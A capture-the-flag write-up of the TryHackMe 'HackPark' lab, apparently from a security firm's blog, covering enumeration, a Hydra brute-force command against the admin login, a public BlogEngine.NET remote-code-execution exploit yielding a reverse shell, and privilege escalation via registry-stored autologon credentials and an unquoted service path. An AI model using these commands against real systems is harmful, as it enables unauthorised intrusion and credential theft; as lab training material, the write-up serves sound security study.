HackPark – TryHackMe – Manual Writeup

Reading Time: ( Word Count: )

February 21, 2021
Nextdoorsec-course

Intro

This machine will cover brute-forcing account credentials & handling public exploits. Here’s a link to the box.

 

Enumeration

Nmap scan

As usual, we’ll start with a Nmap scan.

  ┌──(kali㉿kali)-[~]      └─$ export IP=10.10.219.247   ┌──(kali㉿kali)-[~]      └─$ nmap -A -p- -v -Pn $IP
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: | Supported Methods: GET HEAD OPTIONS TRACE POST |_ Potentially risky methods: TRACE | http-robots.txt: 6 disallowed entries | /Account/*.* /search /search.aspx /error404.aspx |_/archive /archive.aspx |_http-server-header: Microsoft-IIS/8.5 |_http-title: hackpark | hackpark amusements 3389/tcp open ssl/ms-wbt-server? | ssl-cert: Subject: commonName=hackpark | Issuer: commonName=hackpark | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2020-10-01T21:12:23 | Not valid after: 2021-04-02T21:12:23 | MD5: 3032 2fb5 4e45 55fa e4d8 a136 f99f 86d3 |_SHA-1: e191 17b5 7329 905e 23e3 93ca d5b1 fbac a510 663b |_ssl-date: 2021-02-09T08:23:14+00:00; -1s from scanner time. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We have an open Microsoft web server & an RDP port. While inspecting the website, let’s brute-force for other interesting directories in the background.

 

Gobuster directory brute-forcing

  ┌──(kali㉿kali)-[~]      └─$ gobuster dir -u $IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -r
=============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.33.120/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Follow Redir: true [+] Expanded: true [+] Timeout: 10s =============================================================== 2021/02/09 11:14:40 Starting gobuster =============================================================== http://10.10.33.120/contact (Status: 200) http://10.10.33.120/search (Status: 200) http://10.10.33.120/archives (Status: 200) http://10.10.33.120/archive (Status: 200) http://10.10.33.120/content (Status: 403) http://10.10.33.120/contactus (Status: 200) http://10.10.33.120/contacts (Status: 200) http://10.10.33.120/contact_us (Status: 200) http://10.10.33.120/admin (Status: 200)

With the results from gobuster, we find the admin login page. Checking out its request type by inspecting the form element shows us POST requests that send data to the webserver.

We also found the username to be admin, shown in the URL of the login form. Now that we know the request type and have a URL for the login form, we can start brute-forcing the account.

 

Exploitation

Hydra account brute-forcing

1. Go to the website’s login page and try to login with random credentials.
2. Press “F12” or open “Toggle Tools” in Firefox.
3. Select the “Network” tab.
4. Make an attempt to login with random credentials.
5. Find & select the “POST” request under the “Method” column.
6. Copy the URL starting from “/Account/login” and paste it somewhere to build your command:

7. On the right tab, press on “Request“, scroll all the way down and copy the contents of “Request payload“, and append to the previous link separated by a colon ( : )

8. Replace your typed username & password with ^USER^ & ^PASS^
9. Append “:Login failed” to your command at the end.
10. Result:

┌──(kali㉿kali)-[~]    └─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -vV $IP http-post-form [space] '/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=Ah9VhN0B9RYiuDF6%2BMvlcOfR2OZ%2BcVvkr8LcnJfzMeJe0OsCPo4OMJqfrYasix92wNYHbqm3cgxMec8Z3h%2BBtn71HLVzu495K9ySQE%2BaR5NaEV9vvjt%2FBoz6fXaTTlxQanuQfR%2BZ2DNwqBdqlUfO8vlAE3NKBLb3pMibwwXIuzcifowsfWzKWO15KVeFasS1n6EPMAB33j%2Fc8mcC1xnuzXx4nXB6pMHqc8C7Ka%2FisZdEflgRP%2BG3h8HfycDEoQfd3JXwKSBx6wTeUbSWfJ%2FiRo33Wo6LKwXzIbt%2FVTx8KiWtMV4nKZ2uJ6UcDNcYj6zh5gqaKJYVe7nrldsqKahaN76%2FlEkbKBpHF3aX4%2Bebd9VP4REL&__EVENTVALIDATION=kPO8UUfP8U3ljY712E60qDNGtShCmu43R2e%2B0HQtYgVX%2B5p8S6py0jOleecXbbrYF6%2BysanDe3AFCGrRdbjRSrETb2AzXWJW%2BOzx5muLNpEaphKyLRO%2FIuplxczYtgZDHQ14RpBckwusfOI4Bg%2F4h5AjHQ769OAAq1pJvXMoY%2FrkZlbc&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed'

This string has three parts divided by colons:
path to the login form page : request body : error message indicating failure

 

Searchsploit

After logging in as admin, we find the BlogEngine version to be 3.3.6.0 & search for an exploit:

  ┌──(kali㉿kali)-[~]      └─$ searchsploit blogengine 3 ---------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------- --------------------------------- BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection | xml/webapps/48422.txt BlogEngine 3.3 - XML External Entity Injection | windows/webapps/46106.txt BlogEngine 3.3.8 - 'Content' Stored XSS | aspx/webapps/48999.txt BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting | asp/webapps/32874.txt BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure | asp/webapps/35168.txt BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution | aspx/webapps/46353.cs BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Executio | aspx/webapps/47010.py BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal | aspx/webapps/47035.py BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Exe | aspx/webapps/47011.py BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection | aspx/webapps/47014.py ---------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results

Copy the exploit locally, change the IP & port & start listening to the choosen port.

  ┌──(kali㉿kali)-[~]      └─$ cp /usr/share/exploitdb/exploits/aspx/webapps/46353.cs ./PostView.ascx   ┌──(kali㉿kali)-[~]      └─$ gedit PostView.ascx   ┌──(kali㉿kali)-[~]      └─$ sudo nc -nlvp 443

According to the exploit description, we need to do the following:
1. Navigate to Content
2. Posts
3. New
4. Upload Exploit (name must be PostView.ascx)
5. Publish
6. Visit http://TARGET_IP/?theme=../../App_Data/files to get a shell

listening on [any] 443 ... connect to [x.x.x.x] from (UNKNOWN) [10.10.3.192] 50120 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv> whoami c:\windows\system32\inetsrv>whoami iis apppool\blog

 

 

Privilege Escalation

Systeminfo to get an overview

Let’s see the machine’s specs:

> systeminfo
c:\windows\system32\inetsrv>systeminfo Host Name: HACKPARK OS Name: Microsoft Windows Server 2012 R2 Standard OS Version: 6.3.9600 N/A Build 9600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00252-70000-00000-AA886 Original Install Date: 8/3/2019, 10:43:23 AM System Boot Time: 2/9/2021, 3:19:24 AM System Manufacturer: Xen System Model: HVM domU System Type: x64-based PC ...

 

 

Whoami privileges check

> whoami /priv
c:\windows\system32\inetsrv>systeminfo PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated.

 

There are two types of access tokens:

  • primary access tokens: those associated with a user account that are generated on log on
  • impersonation tokens: these allow a particular process (or thread in a process) to gain access to resources using the token of another (user/client) process.

We could use token impersonation to gain system access.

Winlogon credentials

Let’s check the registry for User Autologon / Winlogon credentials:

> reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
... LastUsedUsername REG_SZ administrator AutoAdminLogon REG_DWORD 0x1 DefaultUserName REG_SZ administrator DefaultPassword REG_SZ 4q6[redacted]Fdxs

It looks like we found some admin credentials; let’s use the open RDP port to connect to the machine.

> xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:$IP /u:administrator /p:'4q6X[redacted]dxs'

We’ve unusually retrieved the flag. Let us continue with the normal path to exploit another weakness this box has.

 

Unquoted Service Paths

Let’s search for unquoted service paths:

> wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
AWS Lite Guest Agent AWSLiteAgent C:\Program Files\Amazon\XenTools\LiteAgent.exe Auto System Scheduler Service WindowsScheduler C:\PROGRA~2\SYSTEM~1\WService.exe Auto

Let’s query the service name for more info.

> sc qc WindowsScheduler
[SC] QueryServiceConfig SUCCESS SERVICE_NAME: WindowsScheduler TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\PROGRA~2\SYSTEM~1\WService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : System Scheduler Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem

Check out the log files for the right binary name that’s being run automatically. In the system scheduler map, you can replace the message.exe with a generated shell exec to get an admin shell as an alternative.

Aydan Arabadzha

Aydan Arabadzha

Author

Aydan, a cybersecurity ace and AI visionary, thrives on the frontlines of offensive security. His passion birthed NextdoorSec, a groundbreaking cybersecurity firm. A relentless pioneer, Aydan is persistently pushing boundaries, shaping the future of the digital world one byte at a time.

Other interesting articles

Automated vs Manual Penetration Testing

Automated vs Manual Penetration Testing

Pentesting is largely divided into two methodologies: Automated vs Manual Penetration Testing. Both have ...
8 Steps in Penetration Testing You Should Know

8 Steps in Penetration Testing You Should Know

Mastering the art of penetration testing has become a critical ability for security experts to combat cyber ...
Spear Phishing vs Whaling: What is the Difference

Spear Phishing vs Whaling: What is the Difference

Spear phishing is a particularly devious type of phishing assault in which the individual targeted plays a ...
0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *